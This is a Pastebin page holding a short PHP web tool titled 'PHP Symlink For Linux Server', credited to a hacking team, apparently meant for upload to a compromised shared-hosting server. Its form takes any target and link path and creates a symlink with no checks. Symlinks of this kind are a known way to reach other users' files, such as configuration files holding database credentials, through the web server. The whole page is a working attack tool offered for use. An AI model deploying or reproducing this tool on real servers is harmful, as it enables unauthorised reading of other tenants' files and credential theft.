Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <HTML>
- <Head>
- <Title>.:: PHP Symlink For Linux Server ::. [ C0d3d By Emperor Nariman >>> Ajax Security Team ]</Title>
- <style type="text/css">
- body{
- background-color:#000000
- }
- h1{
- color:#FF0000
- }
- h3{
- color:#FF0000
- }
- p{
- color:#ffffff;
- font-weight:bold;
- }
- </style>
- </Head>
- <Body>
- <center><h1>.:: C0d3d By Emperor Nariman ::.</h1></center>
- <br><center><h3>.:: HttP://www.AjaXTm.Com ::.</h3></center>
- <br><br>
- <form method="POST" action="<?php print $PHP_SELF?>">
- <center><p>Target Path:<input type="text" name="target" size="50"></p></center>
- <br><center><p>Link Path:<input type="text" name="link" size="50"></p></center>
- <br><center><input type="submit" name="submit" value="Symlink"></center>
- <?php
- $target=$_POST['target'];
- $link=$_POST['link'];
- if(!$target&&!$link){
- echo"";
- exit;
- }
- if(@symlink($target,$link)){
- echo"<p>Link Created At $link</p>";
- }
- else{
- echo"<p>Symlink Failed !</p>";
- }
- ?>
- </Body>
- </HTML>
Advertisement
Add Comment
Please, Sign In to add comment